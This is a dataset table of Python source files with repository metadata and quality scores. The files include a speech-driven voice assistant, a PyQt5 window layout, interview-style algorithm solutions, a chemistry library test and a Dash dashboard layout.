hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b6a04a0f526b072cb08a7b68cb313fe983569b9f | 185 | py | Python | Vamei/function/function2.py | YangPhy/learnPython | 5507fa1a0d2878fc663d62509af8ff959955f822 | [
"MIT"
] | 5 | 2020-05-18T06:54:52.000Z | 2021-05-29T23:17:41.000Z | Vamei/function/function2.py | YangPhy/learnPython | 5507fa1a0d2878fc663d62509af8ff959955f822 | [
"MIT"
] | null | null | null | Vamei/function/function2.py | YangPhy/learnPython | 5507fa1a0d2878fc663d62509af8ff959955f822 | [
"MIT"
] | 1 | 2020-05-17T22:47:49.000Z | 2020-05-17T22:47:49.000Z | a=1
def change_integer(a):
    a = a + 1
    return a

print(change_integer(a))
print(a)

b = [1, 2, 3]

def change_list(b):
    b[0] = b[0] + 1
    return b

print(change_list(b))
print(b)
| 10.277778 | 25 | 0.594595 | 38 | 185 | 2.789474 | 0.315789 | 0.037736 | 0.264151 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.056338 | 0.232432 | 185 | 17 | 26 | 10.882353 | 0.690141 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6a4c2fc1d4f8c281ad941ff066addcc5b88b1da | 1,525 | py | Python | IT77A _assistant.py | JasinAlAmin/Owl-Chatbot | c016f8037c7c4c2386429d07ddd6054136caad54 | [
"Unlicense"
] | null | null | null | IT77A _assistant.py | JasinAlAmin/Owl-Chatbot | c016f8037c7c4c2386429d07ddd6054136caad54 | [
"Unlicense"
] | null | null | null | IT77A _assistant.py | JasinAlAmin/Owl-Chatbot | c016f8037c7c4c2386429d07ddd6054136caad54 | [
"Unlicense"
] | null | null | null | import speech_recognition as sr
import pyttsx3
import pywhatkit
import datetime
import wikipedia
import pyjokes
from googlesearch import search

listener = sr.Recognizer()
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)

def talk(text):
    engine.say(text)
    engine.runAndWait()

def take_command():
    command = ''
    try:
        with sr.Microphone() as source:
            print('listening')
            voice = listener.listen(source)
            command = listener.recognize_google(voice)
            command = command.lower()
            if 'alexa' in command:
                command = command.replace('alexa', '')
                print(command)
    except:
        pass
    return command

def run_owl():
    command = take_command()
    print(command)
    if 'play' in command:
        song = command.replace('play', '')
        talk('playing' + song)
        pywhatkit.playonyt(song)
    elif 'time' in command:
        time = datetime.datetime.now().strftime('%I:%M %p')
        talk('Current time is ' + time)
    elif 'who is' in command:
        whois = command.replace('who is', '')
        info = wikipedia.summary(whois, 1)
        print(info)
        talk(info)
    elif 'what is' in command:
        google = command.replace('what is', '')
        for result in search(google, num=1, stop=1):
            print(result)
        talk(google)
    elif 'date' in command:
        talk('sorry I have a headache')
    elif 'are you single' in command:
        talk('I am in a relationship with wifi')
    elif 'joke' in command:
        talk(pyjokes.get_joke())
    else:
        talk('Please say the command again')

while True:
    run_owl()
| 24.206349 | 51 | 0.655738 | 197 | 1,525 | 5.040609 | 0.451777 | 0.063444 | 0.039275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004209 | 0.220984 | 1,525 | 62 | 52 | 24.596774 | 0.83165 | 0 | 0 | 0.036364 | 0 | 0 | 0.134426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.018182 | 0.127273 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6a829207d8c15d0acfe6594c7b505a0ec551a5f | 7,470 | py | Python | View/old/MainWindow.py | logisticAKB/course-paper1 | 8455d5148e0871912791516126819b0d0b51c7c1 | [
"MIT"
] | 1 | 2021-03-13T17:05:02.000Z | 2021-03-13T17:05:02.000Z | View/old/MainWindow.py | logisticAKB/LandmarkRecognition | 8455d5148e0871912791516126819b0d0b51c7c1 | [
"MIT"
] | null | null | null | View/old/MainWindow.py | logisticAKB/LandmarkRecognition | 8455d5148e0871912791516126819b0d0b51c7c1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainWindow.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(1147, 715)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
        self.gridLayout.setObjectName("gridLayout")
        self.reportLayout = QtWidgets.QVBoxLayout()
        self.reportLayout.setObjectName("reportLayout")
        self.report = QtWidgets.QTableWidget(self.centralwidget)
        self.report.setMinimumSize(QtCore.QSize(410, 0))
        self.report.setMaximumSize(QtCore.QSize(410, 16777215))
        self.report.setShowGrid(True)
        self.report.setGridStyle(QtCore.Qt.SolidLine)
        self.report.setRowCount(2)
        self.report.setObjectName("report")
        self.report.setColumnCount(2)
        item = QtWidgets.QTableWidgetItem()
        self.report.setVerticalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.report.setVerticalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.report.setHorizontalHeaderItem(0, item)
        item = QtWidgets.QTableWidgetItem()
        self.report.setHorizontalHeaderItem(1, item)
        item = QtWidgets.QTableWidgetItem()
        self.report.setItem(0, 0, item)
        item = QtWidgets.QTableWidgetItem()
        self.report.setItem(0, 1, item)
        item = QtWidgets.QTableWidgetItem()
        self.report.setItem(1, 0, item)
        item = QtWidgets.QTableWidgetItem()
        self.report.setItem(1, 1, item)
        self.report.horizontalHeader().setVisible(True)
        self.report.horizontalHeader().setDefaultSectionSize(204)
        self.report.horizontalHeader().setMinimumSectionSize(0)
        self.report.horizontalHeader().setStretchLastSection(False)
        self.report.verticalHeader().setVisible(False)
        self.report.verticalHeader().setCascadingSectionResizes(False)
        self.report.verticalHeader().setDefaultSectionSize(22)
        self.report.verticalHeader().setSortIndicatorShown(False)
        self.report.verticalHeader().setStretchLastSection(False)
        self.reportLayout.addWidget(self.report)
        self.gridLayout.addLayout(self.reportLayout, 0, 0, 1, 1)
        self.imageLayout = QtWidgets.QVBoxLayout()
        self.imageLayout.setObjectName("imageLayout")
        self.image = QtWidgets.QLabel(self.centralwidget)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.image.sizePolicy().hasHeightForWidth())
        self.image.setSizePolicy(sizePolicy)
        self.image.setText("")
        self.image.setPixmap(QtGui.QPixmap("View/StartImage.jpg"))
        self.image.setScaledContents(False)
        self.image.setAlignment(QtCore.Qt.AlignCenter)
        self.image.setObjectName("image")
        self.imageLayout.addWidget(self.image)
        self.buttonLayout = QtWidgets.QHBoxLayout()
        self.buttonLayout.setObjectName("buttonLayout")
        self.openImage = QtWidgets.QPushButton(self.centralwidget)
        self.openImage.setObjectName("openImage")
        self.buttonLayout.addWidget(self.openImage)
        self.recognizeImage = QtWidgets.QPushButton(self.centralwidget)
        self.recognizeImage.setObjectName("recognizeImage")
        self.buttonLayout.addWidget(self.recognizeImage)
        self.imageLayout.addLayout(self.buttonLayout)
        self.gridLayout.addLayout(self.imageLayout, 0, 1, 1, 1)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 1147, 18))
        self.menubar.setObjectName("menubar")
        self.file = QtWidgets.QMenu(self.menubar)
        self.file.setObjectName("file")
        self.help = QtWidgets.QMenu(self.menubar)
        self.help.setObjectName("help")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)
        self.about = QtWidgets.QAction(MainWindow)
        self.about.setObjectName("about")
        self.open = QtWidgets.QAction(MainWindow)
        self.open.setObjectName("open")
        self.exit = QtWidgets.QAction(MainWindow)
        self.exit.setObjectName("exit")
        self.recognize = QtWidgets.QAction(MainWindow)
        self.recognize.setObjectName("recognize")
        self.exportToJson = QtWidgets.QAction(MainWindow)
        self.exportToJson.setObjectName("exportToJson")
        self.file.addAction(self.open)
        self.file.addAction(self.recognize)
        self.file.addAction(self.exportToJson)
        self.file.addSeparator()
        self.file.addAction(self.exit)
        self.help.addAction(self.about)
        self.menubar.addAction(self.file.menuAction())
        self.menubar.addAction(self.help.menuAction())

        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "Установить метки"))
        self.report.setSortingEnabled(True)
        item = self.report.verticalHeaderItem(0)
        item.setText(_translate("MainWindow", "0"))
        item = self.report.verticalHeaderItem(1)
        item.setText(_translate("MainWindow", "1"))
        item = self.report.horizontalHeaderItem(0)
        item.setText(_translate("MainWindow", "Метка"))
        item = self.report.horizontalHeaderItem(1)
        item.setText(_translate("MainWindow", "Уверенность, %"))
        __sortingEnabled = self.report.isSortingEnabled()
        self.report.setSortingEnabled(False)
        item = self.report.item(0, 0)
        item.setText(_translate("MainWindow", "Dog"))
        item = self.report.item(0, 1)
        item.setText(_translate("MainWindow", "99"))
        item = self.report.item(1, 0)
        item.setText(_translate("MainWindow", "Cat"))
        item = self.report.item(1, 1)
        item.setText(_translate("MainWindow", "1"))
        self.report.setSortingEnabled(__sortingEnabled)
        self.openImage.setText(_translate("MainWindow", "Открыть изображение"))
        self.recognizeImage.setText(_translate("MainWindow", "Найти метки"))
        self.file.setTitle(_translate("MainWindow", "Файл"))
        self.help.setTitle(_translate("MainWindow", "Справка"))
        self.about.setText(_translate("MainWindow", "О программе"))
        self.open.setText(_translate("MainWindow", "Открыть изображение"))
        self.exit.setText(_translate("MainWindow", "Выход"))
        self.recognize.setText(_translate("MainWindow", "Найти метки"))
        self.exportToJson.setText(_translate("MainWindow", "Экспорт в JSON"))
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
| 47.278481 | 108 | 0.693039 | 720 | 7,470 | 7.143056 | 0.231944 | 0.073887 | 0.075831 | 0.051332 | 0.215633 | 0.137468 | 0.075053 | 0.040443 | 0 | 0 | 0 | 0.013871 | 0.189291 | 7,470 | 157 | 109 | 47.579618 | 0.83537 | 0.024632 | 0 | 0.070423 | 1 | 0 | 0.070614 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014085 | false | 0 | 0.014085 | 0 | 0.035211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b310ddd7552060444487d3b6bd14778c644bee | 2,012 | py | Python | google_gas_station.py | loghmanb/daily-coding-problem | 97c165fc00422566f463cd862374de66135bc3e3 | [
"MIT"
] | null | null | null | google_gas_station.py | loghmanb/daily-coding-problem | 97c165fc00422566f463cd862374de66135bc3e3 | [
"MIT"
] | null | null | null | google_gas_station.py | loghmanb/daily-coding-problem | 97c165fc00422566f463cd862374de66135bc3e3 | [
"MIT"
] | null | null | null | '''
Gas Station
Asked in: Bloomberg, Google, DE Shaw, Amazon, Flipkart
Given two integer arrays A and B of size N.
There are N gas stations along a circular route, where the amount of gas at station i is A[i].
You have a car with an unlimited gas tank and it costs B[i] of gas to travel from station i
to its next station (i+1). You begin the journey with an empty tank at one of the gas stations.
Return the minimum starting gas station’s index if you can travel around the circuit once, otherwise return -1.
You can only travel in one direction. i to i+1, i+2, … n-1, 0, 1, 2.. Completing the circuit means starting at i and
ending up at i again.
Input Format
The first argument given is the integer array A.
The second argument given is the integer array B.
Output Format
Return the minimum starting gas station's index if you can travel around the circuit once, otherwise return -1.
For Example
Input 1:
A = [1, 2]
B = [2, 1]
Output 1:
1
Explanation 1:
If you start from index 0, you can fill in A[0] = 1 amount of gas. Now your tank has 1 unit of gas. But you need B[0] = 2 gas to travel to station 1.
If you start from index 1, you can fill in A[1] = 2 amount of gas. Now your tank has 2 units of gas. You need B[1] = 1 gas to get to station 0. So, you travel to station 0 and still have 1 unit of gas left over. You fill in A[0] = 1 unit of additional gas, making your current gas = 2. It costs you B[0] = 2 to get to station 1, which you do and complete the circuit.
Solution by interviewbit.com
'''
# @param A : tuple of integers
# @param B : tuple of integers
# @return an integer
def canCompleteCircuit(gas, cost):
    sumo = 0
    fuel = 0
    start = 0
    for i in range(len(gas)):
        sumo = sumo + (gas[i] - cost[i])
        fuel = fuel + (gas[i] - cost[i])
        if fuel < 0:
            fuel = 0
            start = i + 1
    if sumo >= 0:
        return start % len(gas)
    else:
        return -1
if __name__ == "__main__":
    data = [
] | 32.983607 | 376 | 0.66501 | 374 | 2,012 | 3.564171 | 0.320856 | 0.026257 | 0.024756 | 0.036009 | 0.275319 | 0.247562 | 0.172543 | 0.135034 | 0.135034 | 0.135034 | 0 | 0.031544 | 0.259443 | 2,012 | 61 | 377 | 32.983607 | 0.861074 | 0.807157 | 0 | 0.117647 | 0 | 0 | 0.021108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b6b4869088455d04e487300c06f2189b4e0eab83 | 2,020 | py | Python | api/tests/integration/tests/todo/load_utf8.py | epam/Indigo | cb6b0bb5568f414f387e1997ad64c7eedd92c04e | [
"Apache-2.0"
] | 204 | 2015-11-06T21:34:34.000Z | 2022-03-30T16:17:01.000Z | api/tests/integration/tests/todo/load_utf8.py | mongrzzzzzfr/Indigo | 07cb744a90ff17828f8c1185bcc2e78cb4e882b3 | [
"Apache-2.0"
] | 509 | 2015-11-05T13:54:43.000Z | 2022-03-30T22:15:30.000Z | api/tests/integration/tests/todo/load_utf8.py | mongrzzzzzfr/Indigo | 07cb744a90ff17828f8c1185bcc2e78cb4e882b3 | [
"Apache-2.0"
] | 89 | 2015-11-17T08:22:54.000Z | 2022-03-17T04:26:28.000Z | # coding=utf-8
import sys
sys.path.append('../../common')
from env_indigo import *
indigo = Indigo()
indigo.setOption("molfile-saving-skip-date", "1")
print("****** Load molfile with UTF-8 characters in Data S-group ********")
m = indigo.loadMoleculeFromFile(joinPathPy("molecules/sgroups_utf8.mol", __file__))
indigo.setOption("molfile-saving-mode", "2000")
res = m.molfile()
m = indigo.loadMolecule(res)
# TODO: Fails on IronPython 2.7.9:
# - M SED 1 single-value-бензол
# + M SED 1 single-value-������
if isIronPython():
    from System.Text import Encoding
    from System import Console
    print(m.molfile())
    print(res)
    print(m.cml())
    # reload(sys)
    # sys.setdefaultencoding('utf-8')
    # sys.stdout = codecs.getwriter('utf8')(sys.stdout)
    # Console.WriteLine(m.molfile().encode("utf-8-sig"))
    # print(Encoding.UTF8.GetString(Encoding.Default.GetBytes(m.molfile().encode("utf-8-sig"))))
    # Console.Write(Encoding.UTF8.GetString(Encoding.UTF8.GetBytes(m.molfile().encode("utf-8"))))
    # Console.Write(Encoding.UTF8.GetString(Encoding.UTF8.GetBytes(res.encode("utf-8"))))
    # Console.Write(Encoding.UTF8.GetString(Encoding.UTF8.GetBytes(m.cml().encode("utf-8"))))
    # m.saveMolfile("test.mol")
    # with codecs.open(joinPathPy("test.mol", __file__), "r", "utf-8-sig") as temp:
    #     print(temp.read()[510:])
    # with codecs.open('test', 'w', "utf-8") as f:
    #     f.write(m.molfile())
    #     Console.WriteLine(m.molfile())
    #     f.write(repr(Encoding.UTF8.GetString(Encoding.Default.GetBytes(m.molfile()))))
    #     f.write(temp.read())
    #     f.write(Encoding.UTF8.GetString(Encoding.Default.GetBytes(m.molfile().encode('utf-8'))))
    #     Console.Write(str(temp.read()).encode('utf-8'))
else:
    if sys.version_info[0] < 3:
        print(m.molfile().encode("utf-8"))
        print(res.encode("utf-8"))
        print(m.cml().encode("utf-8"))
    else:
        print(m.molfile())
        print(res)
        print(m.cml())
| 36.071429 | 102 | 0.631683 | 272 | 2,020 | 4.672794 | 0.3125 | 0.047207 | 0.078678 | 0.1369 | 0.426436 | 0.36192 | 0.343037 | 0.343037 | 0.239969 | 0.196696 | 0.00297 | 0.024434 | 0.169307 | 2,020 | 55 | 103 | 36.727273 | 0.72944 | 0.531683 | 0 | 0.32 | 0 | 0 | 0.180932 | 0.054171 | 0 | 0 | 0 | 0.018182 | 0 | 1 | 0 | false | 0 | 0.16 | 0 | 0.16 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcaad3bf3e2640d58347e127fd2a0d0a345cbdb7 | 1,477 | py | Python | app/dashapp3/layout.py | credwood/bitplayers | 4ca6b6c6a21bb21d7cd963c64028415559c3dcc4 | [
"MIT"
] | 1 | 2020-06-26T21:49:14.000Z | 2020-06-26T21:49:14.000Z | app/dashapp3/layout.py | credwood/bitplayers | 4ca6b6c6a21bb21d7cd963c64028415559c3dcc4 | [
"MIT"
] | 2 | 2020-03-31T11:11:04.000Z | 2021-12-13T20:38:48.000Z | app/dashapp3/layout.py | credwood/bitplayers | 4ca6b6c6a21bb21d7cd963c64028415559c3dcc4 | [
"MIT"
] | null | null | null | import dash_core_components as dcc
import dash_html_components as html
import dash_table
import plotly
import plotly.graph_objs as go
layout = html.Div([
    html.H2('Top Locations of Search Terms'),
    html.P('Term searches may take several seconds. Please be patient.'),
    html.P('Twitter users are not required to list a location in their profile; search results only reflect those who do.'),
    html.A("Home", id='Home', href="http://127.0.0.1:5000/"),
    html.Br(),
    html.Br(),
    dcc.Input(id='term_search', value='enter search term', type='text'),
    html.Br(),
    html.Br(),
    dcc.Graph(id='live-graph', animate=False),
    dcc.Interval(id='graph-update', interval=1*10000),
    html.Br(),
    html.Br(),
    html.P('Partial records for up to 100 of the most recent tweets containing search term'),
    dash_table.DataTable(
        id='datatable-row-ids',
        style_data={
            'whiteSpace': 'normal',
            'height': 'auto'
        },
        columns=[
            {'name': i, 'id': i, 'deletable': True}
            for i in ['date_time', 'content', 'verified', 'lang',
                      'location', 'user', 'is_rt', 'textblob_sentiment',
                      'vader_sentiment']
            # omit the id column
            if i != 'id'
        ],
        page_action='custom',
        page_current=0,
        page_size=10
    ),
    html.Div(id='datatable-row-ids-container')
])
"""
layout = html.Div([
dash_table.DataTable(
id='tweet-table',
)])
"""
| 29.54 | 125 | 0.600542 | 199 | 1,477 | 4.371859 | 0.572864 | 0.041379 | 0.045977 | 0.041379 | 0.034483 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020591 | 0.243737 | 1,477 | 49 | 126 | 30.142857 | 0.758281 | 0.012187 | 0 | 0.153846 | 0 | 0 | 0.386131 | 0.019708 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.128205 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcab580f13057192e08af639baf51b83a9fa44ae | 1,375 | py | Python | lintcode/Medium/052_Next_Permutation.py | Rhadow/leetcode | 43209626720321113dbfbac67b3841e6efb4fab3 | [
"MIT"
] | 3 | 2017-04-03T12:18:24.000Z | 2018-06-25T08:31:04.000Z | lintcode/Medium/052_Next_Permutation.py | Rhadow/leetcode | 43209626720321113dbfbac67b3841e6efb4fab3 | [
"MIT"
] | null | null | null | lintcode/Medium/052_Next_Permutation.py | Rhadow/leetcode | 43209626720321113dbfbac67b3841e6efb4fab3 | [
"MIT"
] | null | null | null | class Solution:
    # @param num : a list of integer
    # @return : a list of integer
    def nextPermutation(self, num):
        # write your code here
        # Version 1
        bp = -1
        for i in range(len(num) - 1):
            if (num[i] < num[i + 1]):
                bp = i
        if (bp == -1):
            num.reverse()
            return num
        rest = num[bp:]
        local_max = None
        for i in rest:
            if (i > rest[0] and (local_max is None or i < local_max)):
                local_max = i
        rest.pop(rest.index(local_max))
        rest = sorted(rest)
        return num[:bp] + [local_max] + rest

        # Version 2
        # i = len(num) - 1
        # target_index = None
        # second_index = None
        # while (i > 0):
        #     if (num[i] > num[i - 1]):
        #         target_index = i - 1
        #         break
        #     i -= 1
        # if (target_index is None):
        #     return sorted(num)
        # i = len(num) - 1
        # while (i > target_index):
        #     if (num[i] > num[target_index]):
        #         second_index = i
        #         break
        #     i -= 1
        # temp = num[target_index]
        # num[target_index] = num[second_index]
        # num[second_index] = temp
| 30.555556 | 90 | 0.452364 | 170 | 1,375 | 3.541176 | 0.252941 | 0.182724 | 0.139535 | 0.044851 | 0.129568 | 0.129568 | 0 | 0 | 0 | 0 | 0 | 0.019036 | 0.426909 | 1,375 | 44 | 91 | 31.25 | 0.744924 | 0.44 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcb5031213b77f76c4941cf91243b5919e3974dd | 406 | py | Python | python_tutorials/sets.py | bionikspoon/HackerRank | d896009019811b926a4404df005fc7ea0184c505 | [
"MIT"
] | null | null | null | python_tutorials/sets.py | bionikspoon/HackerRank | d896009019811b926a4404df005fc7ea0184c505 | [
"MIT"
] | null | null | null | python_tutorials/sets.py | bionikspoon/HackerRank | d896009019811b926a4404df005fc7ea0184c505 | [
"MIT"
] | null | null | null | def get_stdin():
    raw_input()
    list_1 = raw_input().split()
    raw_input()
    list_2 = raw_input().split()
    return list_1, list_2
if __name__ == '__main__':
    set_m, set_n = get_stdin()
    set_m = set(set_m)
    set_n = set(set_n)
    result = []
    result.extend(set_m.difference(set_n))
    result.extend(set_n.difference(set_m))
print "\n".join(sorted(result, key=lambda x: int(x))) | 25.375 | 57 | 0.633005 | 66 | 406 | 3.469697 | 0.393939 | 0.087336 | 0.091703 | 0.069869 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0125 | 0.211823 | 406 | 16 | 57 | 25.375 | 0.703125 | 0 | 0 | 0.142857 | 0 | 0 | 0.02457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fcb5c152d09a0048b13ae6ac86607f09ed887da3 | 661 | py | Python | release/stubs.min/Revit/References.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
